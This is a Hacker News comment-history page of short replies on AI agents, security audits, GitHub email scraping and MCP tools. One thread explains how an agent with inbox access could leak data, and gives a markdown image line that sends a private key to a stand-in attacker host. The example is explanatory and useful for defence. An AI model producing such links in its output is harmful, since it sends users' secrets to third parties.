Hacker Newsnew | past | comments | ask | show | jobs | submit | eli's commentslogin

It depends whether anyone was ever actually going to spend that week doing it the "hard" way. Having Claude do it in a few minutes beats doing nothing.

Put another way: I absolutely would have an intern work on a security audit. I would not have an intern replace a professional audit though.

It's otherwise a pretty low stakes use. I'd expect false positives to be pretty obvious to someone maintaining the code.


My point is that it’s one thing to say I want my intern to start doing a security audit.

It’s another thing to say hey intern security audit this entire code base.

LLM’s thrive on context. You need the right context at the right time, it doesn’t matter how good your model is if you don’t have that.


Why would a tool that works need to dissuade skeptics from trying it?

Based on his twitter he may just like irony/meta posting a little too much like a lot of modern culture

Neither side wants that so seems pretty unlikely

You still have to trust your executive assistant. I would never give someone I don't trust the ability to read and write emails for me.

If this takes off, I wonder if platforms will start providing API tokens scoped for assistants. They have permissions for non destructive actions like reading mails, flagging important mails, creating drafts, moving to trash, but not more.

How does my email platform know which messages I want my agent to see and which are too sensitive?

I don't see how it's possible to securely give an agent access to your inbox unless it has zero ability to exfiltrate (not sending mail, not making any external network requests). Even then, you need to be careful with artifacts generated by the agent because a markdown file could transmit data when rendered.


> a markdown file could transmit data when rendered.

This is a new threat vector to me. Can you tell me more?


Your markdown file has an image that links to another server controlled by the attacker and the path/query parameters you're attempting to render contains sensitive data.

    ![](https://the-attacker.com/steal?private-key=abc123def


Yes. It’s kind of like giving power of attorney to Jeffery Epstein.

Seems to be working out alright for old Wexner.

How would you know whether the account that did the scraping was banned?

By visiting the account and noticing that it still has activity long after the report.

I'm confused. How do you know what account scraped your email address from github in order to send you an email?

Or do you mean going after the accounts of companies that make use of a likely scraped email address? That's not a bad idea either, but it has risks and isn't the same thing.


Half the time they literally say it in the email. I just looked in my spam folder and just a few hours ago got an email titled "Your profile: Github", that started with:

> I came across your profile on GitHub. Given you're based in the US, I thought it might be relevant to reach out. > > Profile: https://github.com/tedivm

They aren't doing anything to hide it.


But hold on.

They could have git cloned your repo, used or otherwise analyzed your code which follows TOS then used the local git repo to pull your email address.

How is GitHub responsible here?


They could have, but it seems unlikely they targeted one or two repos and probably cloned thousands or more.

That identifies the company that sent the email not the github account that scraped it

How do you propose GH take action without risking taking down legitimate projects due to brigades of false reports?

GH literally say in a parent comment:

> we can (and do) take action against those accounts including banning the accounts


That they use some of their trillion dollar marketshare to solve it, why are you acting like this is a hard problem? It's not. They're just too cheap and greedy to do anything about it.

Trillion dollar marketshare? How big do you think GitHub is?

GitHub is wholly owned by Microsoft, which has a 3 trillion market cap

When I left, GH was valued at around $40 billion. Above the $8B they were purchased for. Well below $1T that is claimed

Even if they were valued around $100million they would still have more enough resources to solve this problem. Stop excusing companies that hate hiring people and are so greedy they would rather punt this problem to the commons fucking over an entire community that literally enabled them to exist.

Come on here, even Meta hires people in Kenya to look at CP and snuff films to label this stuff. Meta! They literally profited off of a genocide and they still know how to do this.

Excuse after excuse for these greedy companies.


One would expect people on Hacker News to know that a single business division doesn't have direct access to the funds of other business divisions of the same corporation.

One would expect people on HN should know that companies subsidize failing BU all the time with their profitable BUs.

Sorry but why are you making excuses for these insanely greedy companies that don't want to hire people to solve a basic problem?


How small do you think Microsoft is??!

GitHub is not all of Microsoft.

I have never had a problem using cli tools intead of mcp. If you add a little list of the available tools to the context it's nearly the same thing, though with added benefits of e.g. being able to chain multiple together in one tool call

Not doubting you just sharing my experience - was able to get dramatically better experience for multi step workflows that involve feedback from SQL compilers with MCP. Probably the right harness to get the same performance with the right tools around the API calls but was easier to stop fighting it for me

Did you test actually having command line tools that give you the same interface as the MCP's? Because that is what generally what people are recommending as the alternative. Not letting the agent grapple with <random tool> that is returning poorly structured data.

If you option is to have a "compileSQL" MCP tool, and a "compileSQL" CLI tool, that that both return the same data as JSON, the agent will know how to e.g. chain jq, head, grep to extract a subset from the latter in one step, but will need multiple steps with the MCP tool.

The effect compounds. E.g. let's say you have a "generateQuery" tool vs CLI. In the CLI case, you might get it piping the output from one through assorted operations and then straight into the other. I'm sure the agents will eventually support creating pipelines of MCP tools as well, but you can get those benefits today if you have the agents write CLI's instead of bothering with MCP servers.

I've for that matter had to replace MCP servers with scripts that Claude one-shot because the MCP servers lacked functionality... It's much more flexible.


That's just because they're relatively inexpensive

Not all that different from Musk buying Twitter. Happens pretty often with private equity as a buyer.

Is it also possible that crackme solutions were already in the training data?


I used the latest submissions from sites like crackmes.ones which were days or weeks old to guard against that.


I’m not sure it’s possible to conclude what hey actually believes from public statements. I do not trust him to tell the truth about anything related to AI.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: